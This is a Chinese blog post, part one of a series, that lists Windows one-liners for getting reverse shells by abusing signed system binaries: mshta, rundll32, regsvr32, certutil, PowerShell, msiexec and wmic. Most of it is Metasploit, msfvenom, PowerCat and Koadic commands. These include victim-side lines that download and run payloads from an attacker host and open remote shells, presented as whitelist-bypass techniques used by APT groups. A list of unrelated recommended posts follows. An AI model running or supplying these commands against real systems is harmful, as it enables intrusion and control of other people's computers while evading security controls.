windows下基于白名单获取shell的方法整理(上)
off999 2024-09-20 22:40 44 浏览 0 评论
前言
日常整理,当作笔记方便查阅。这一整篇文章的来源主要是看到了一位老外发的Get Reverse-shell via Windows one-liner文章而来,所幸就将他的作为上篇,待我整理后在把下篇发出来。
这种方法也被很多黑产和APT组织用来白加黑免杀,简直就是屡试不爽。最后本人也是菜鸡一只,就当作学习而写,如有不对的地方,望指出。
概述
一般来说,我们经常利用HTTP服务或者其他服务RCE漏洞获得反向shell。而这篇文章主要讨论windows 单行命令执行Powershell或者rundll32恶意指令获得windows系统反向shell。我们准备了windows命令行列表,能使你获得目标计算机的反向shell。
内容列表
Mshta.exe
- 通过Metasploit的HTA Web服务器发起HTA攻击
Rundll32.exe
- 通过Metasploit的SMB交付发起Rundll32攻击
Regsvr32.exe
- 通过Metasploit的脚本Web交付启动Regsvr32
Certutil.exe
- 通过Msfvenom C#shellcode启动MSbuild攻击
Powershell.exe
- 通过Powershell启动Powercat攻击
- 通过Powershell启动cscript.exe
- 通过Powershell启动批处理文件攻击
Msiexec.exe
- 通过msfvenom发起msiexec攻击
Wmic.exe
- 通过Koadic发起Wmic.exe攻击
Mshta.exe
Mshta.exe运行微软HTML应用程序主机,微软HTML应用程序主机是Windows应用用程序,负责运行HTA(HTML应用程序)文件。我们通运行HTML文件执行JavaScript和VBScript脚本。Mshta.exe可以解释这种文件。
Metasploit 包含生成恶意HTA文件的“HTA WebServer”模块,恶意文件通过Powershell运行有效负载。当用户导航到HTA文件时,将在执行有效负载之前由IE两次提示它们。
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) >set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) >set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) >exploit现在可以在受害者机器上执行mshta.exe恶意代码获得meterpreter会话
在受害者机器上通过mshta.exe访问恶意hta远程文件,你就可以在本机获得shell。
mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta获得受害主机shell:
Rundll.exe
Rundll32.exe与Windows操作系统相关联,Rundll32.exe可调用从DLL导出的函数(16位或32位)并将其存储在特定的内存库中。
通过SMB交付Metasploit发起Rundll32攻击
Metasploit包含“ SMB Delivery”模块,该模块生成恶意的dll文件。 该模块通过SMB服务器提供有效负载,并提供控制命令。 当前支持DLL和Powershell。
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit下面通过Rundll32.exe命令获得meterpreter会话。
在受控机器上远程执行恶意dll,你将获得受控计算机的反向shell。
rundll32.exe \\192.168.1.109\vabFG\test.dll,0获得meterpreter会话如下:
Regsvr32.exe
Regsvr32.exe是一个命令行程序,用于注册和注销OLE控件,例如Windows注册表中的DLL和ActiveX控件。Regsvr32.exe安装在Windows XP和Windows更高版本的%systemroot%\ System32文件夹下。
RegSvr32.exe具有以下命令行选项:
语法:Regsvr32 [/ s] [/ u] [/ n] [/ i [:cmdline]]<dllname>
/ u –注销服务器
/ i –调用DllInstall,并为其传递可选的[cmdline]; 与/ u一起使用时,它将调用dll进行卸载
/ n –不调用DllRegisterServer;此选项必须与/ i一起使用/ s –静音;不显示消息框
通过Metasploit的脚本Web交付启动Regsvr32
此模块可快速启动提供有效负载的Web服务器。提供的命令将允许有效负载下载并执行。它将通过regsvr32.exe来指定脚本语言解释器或“ squibledoo”来绕过应用程序白名单。该模块的主要目的是在目标计算机上快速建立会话。
Regsvr32使用squiblydoo技术绕过应用程序白名单。签名的Microsoft二进制文件Regsvr32能够运行.sct文件,然后在其中执行包含PowerShell命令。两个Web请求(即.sct文件和PowerShell下载/执行)都可以在同一端口上执行。“PSH(Binary)”会将文件写入到硬盘中,允许自定义二进制文件被下载和执行。
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payloadphp/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost192.168.1.109
msf exploit (web_delivery)>set srvhost192.168.1.109
msf exploit (web_delivery)>exploit复制下图中突出被框选的代码:
一旦该exploit被执行,您将拥有一个为您创建的URL。在受害者pc的命令提示符中运行该URL,如下所示:
一旦该exploit被执行,您将拥有一个为您创建的URL。在受害者pc的命令提示符中运行该URL,如下所示:
在命令执行后按Enter键,您将拥有您的会话。如下图所示,输入sysinfo命令获取主机信息:
Certutil.exe
Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件,并获取meterpreter会话。
通过Msfvenom 发起certutil攻击
通过msfvenom 生成恶意可执行文件,并使用start multi/handler 获取目标计算机反向shell会话。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe再用python生成一个简易的http服务器
现在,为了使用certutil.exe能够获取配置信息和可执行文件,我们需要使用如下语法:
语法:[-f] [-urlcache] [-split]可执行文件路径
certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exeuse exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit这样,我们获得了目标计算机的反向shell。如下所示:
Powershell.exe
您可以使用PowerShell.exe从另一个工具(例如Cmd.exe)的命令行启动PowerShell会话,也可以在PowerShell命令行启动新会话。从此处阅读Microsoft Windows官方网站上的更多信息。
通过Powershell启动Powercat攻击
PowerCat是一个的powershell写的TCP / IP瑞士军刀,看一看成NCAT的的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,SMB协议支持,中继模式,生成有效载荷,端口扫描等等。
在本地计算机中下载 PowerShell,然后下载 Powercat.ps1,使用 python HTTP 服务器传输文件,以获取目标的反向外壳,如下所示,然后启动 netcat 侦听器。
git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80然后在远程端执行下面的命令获得netcat会话。
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"正如你观察到的,我们已经获得了目标机器的netcat会话。
批处理文件攻击
同样,PowerShell 允许客户端执行批处理文件,因此让我们使用 msfvenom 生成恶意批处理文件,如下所示,然后启动 netcat 侦听器。
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat然后执行以下命令以获取 netcat 会话。
powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))如下,我们已经获得了目标机器的netcat会话。
利用cscript.exe
同样,PowerShell 允许客户端执行cscript.exe 运行 wsf、js 和vbscript文件。因此,让我们生成具有 msfvenom 的恶意bat文件,如下所示,并作为侦听器启动multi/handler程序。
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs >1.vbs在目标机器上执行下面的命令行获得meterpreter会话。
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit获得meterpreter会话如下:
Msiexec.exe
Windows 操作系统附带了一个 Windows 安装程序引擎,该引擎由 MSI 程序包用于应用程序的安装。解释包和安装产品的可执行程序就是 Msiexec.exe。
通过msfvenom发起msiexec攻击
让我们利用MeterpreterWindows攻击载荷生成 MSI 包文件(1.msi)如下所示,并作为侦听器启动multi/handler程序进行监听。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109lport=1234 -f msi > 1.msi在msiexec 的帮助下,一旦您在远程计算机上执行 1.msi 文件,你会得到反向连接在您的本地计算机(Kali Linux).
msiexec /q /i http://192.168.1.109/1.msiuse exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit获得meterpreter会话如下:
Wmic.exe
WMIC .exe是一个 Microsoft 工具,它提供了一个 WMI命令行界面,用于本地和远程计算机的各种管理功能,还用于在本地或远程执行系统设置、停止进程和执行脚本等查询。因此,它可以调用 XSL 脚本(可增强样式表语言)。
通过Koadic发起Wmic.exe攻击
koadic是一个命令控制(C2)工具,类似Metasploit和Powershell Empire。使用koadic我们生成恶意XSL文件。koadic安装完成后,您可以运行./koadic 文件以启动 koadic,然后通过运行以下命令开始加载stager/js/wmic 程序,并将 SRVHOST 设置为程序回连IP。
use stager/js/wmic
set SRVHOST 192.168.1.107
run执行 WMIC 以下命令,从远程服务器下载和运行恶意 XSL 文件:
wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"一旦恶意的XSL文件在目标计算机上执行,你将有一个僵尸连接,就像Metasploit回连的情况一样。
相关推荐
- ie浏览器9(IE浏览器9.0如何升级)
-
1、首先,我们点击开始菜单,找到控制面板,点击一下。2、之后,找到程序和功能选项,点击一下。3、点击进入后,我们找到左边的打开或关闭windows功能,点击一下。4、点击进入后,找到Internet...
- hp1020打印机驱动怎么下载(hp1020打印机驱动怎么下载)
-
惠普1020打印机驱动怎么安装: 1.首先到下载软件名称:惠普1020打印机驱动程序官方版(支持win7/8)32位/64位软件大小:5.09MB更新时间:2014-09-05立即下载 2.然后...
- win2003是windows7系统(win2003哪个版本好)
-
win2003是专门用于服务器的操作系统,现在最主流的windows服务器系统主要是win2003server和win2008server,winXP是个人电脑专用的操作系统,现在微软已经不再提供XP...
- 路由器账号和密码忘了怎么办
-
你好,如果你忘记了路由器的用户名和密码,你可以尝试重置一下路由器,大多数路由器都配备了一个复位按键。在重置路由器之后,用户名和密码将被还原为默认值,你可以在路由器的用户手册或厂家网站上找到默认的用户名...
- win10永久禁止自动更新(win10禁止自动更新彻底)
-
阻止Windows10自动更新的方法如下:使用“本地组策略编辑器”:按下“Win+R”键,输入“gpedit.msc”打开本地组策略编辑器,找到“计算机配置”>“管理模板”>“W...
- 联想笔记本怎么看配置和型号
-
联想笔记本看配置的方法如下1、打开电脑,点击桌面的计算机,右键菜单里选择【属性】;打开后,即可看到电脑系统的大概信息;2、如果要看比较详细的设备相关信息,点击桌面的计算机,点击右键,在菜单里选择【系统...
- win10下载应用商店(win10应用商店打不开)
-
1、点击Win10系统的开始菜单,然后在点击应用商店;2、打开Win10应用商店后,在搜索框里输入想要搜索的应用软件,然后点击检索;3、点击搜索到的应用,点击安装;4、点击安装后,系统会提示要切换到这...
- dell电脑重装系统win10(dell 重装win10系统)
-
戴尔笔记本重装系统win10的步骤如下:制作好wepe启动盘之后,将win10系统iso镜像直接复制到U盘。在需要重装系统的戴尔电脑上插入pe启动盘,重启后不停按F12启动快捷键,调出启动菜单对话框,...
- android升级包下载安装(android 升级包)
-
打开手机系统更新升级,前提是官方有新系统推送才能更新 哪个大不一定,但一般规律如下: 1、小版本的更新,通常越更新越大。比如3.1更新到3.2,通常是修复bug,代码量通常会增大,体积就会增大。 ...
- hdd硬盘和ssd(ssd硬盘和hdd硬盘是什么意思)
-
HDD硬盘和SSD硬盘是两种不同类型的电脑存储设备,它们有着以下区别:1.工作原理:HDD硬盘使用机械旋转的磁盘和读写磁头来存储和读取数据,而SSD硬盘则使用闪存存储数据,类似于USB闪存盘。2....
- 电脑免费软件下载大全(电脑上免费的下载软件)
-
正常情况下,如果我们想要在自己的电脑上面下载一个不要钱的单机游戏,那么我们是可以直接在我们的软件管理中心进行一个下载的,这个时候我们只需要通过一个权限就能够正常的下载,当然我们也是可以在一些小游戏的软...
- mpp文件转换excel(mpp转换成pdf)
-
要将Excel表格转换为MPP格式,您可以按照以下步骤操作:1.打开Excel表格并确保数据按照项目的不同阶段或任务进行组织。2.将Excel表格中的数据复制到一个新的MicrosoftProj...
- win7旗舰版开机密码忘记按f2
-
方法如下:开始-控制面板-用户帐户;在打开的更改用户帐户界面点击要更改的帐户;然后点击帐户左面的更改密码按钮;在打开的页面上,输入一次当前使用的密码,输入2次要更改的新密码然后保存退出就可以了...
欢迎 你 发表评论:
- 一周热门
-
-
抖音上好看的小姐姐,Python给你都下载了
-
全网最简单易懂!495页Python漫画教程,高清PDF版免费下载
-
Python 3.14 的 UUIDv6/v7/v8 上新,别再用 uuid4 () 啦!
-
飞牛NAS部署TVGate Docker项目,实现内网一键转发、代理、jx
-
python入门到脱坑 输入与输出—str()函数
-
宝塔面板如何添加免费waf防火墙?(宝塔面板开启https)
-
Python三目运算基础与进阶_python三目运算符判断三个变量
-
(新版)Python 分布式爬虫与 JS 逆向进阶实战吾爱分享
-
失业程序员复习python笔记——条件与循环
-
系统u盘安装(win11系统u盘安装)
-
- 最近发表
- 标签列表
-
- python计时 (73)
- python安装路径 (56)
- python类型转换 (93)
- python进度条 (67)
- python吧 (67)
- python的for循环 (65)
- python格式化字符串 (61)
- python静态方法 (57)
- python列表切片 (59)
- python面向对象编程 (60)
- python 代码加密 (65)
- python串口编程 (77)
- python封装 (57)
- python写入txt (66)
- python读取文件夹下所有文件 (59)
- python操作mysql数据库 (66)
- python获取列表的长度 (64)
- python接口 (63)
- python调用函数 (57)
- python多态 (60)
- python匿名函数 (59)
- python打印九九乘法表 (65)
- python赋值 (62)
- python异常 (69)
- python元祖 (57)
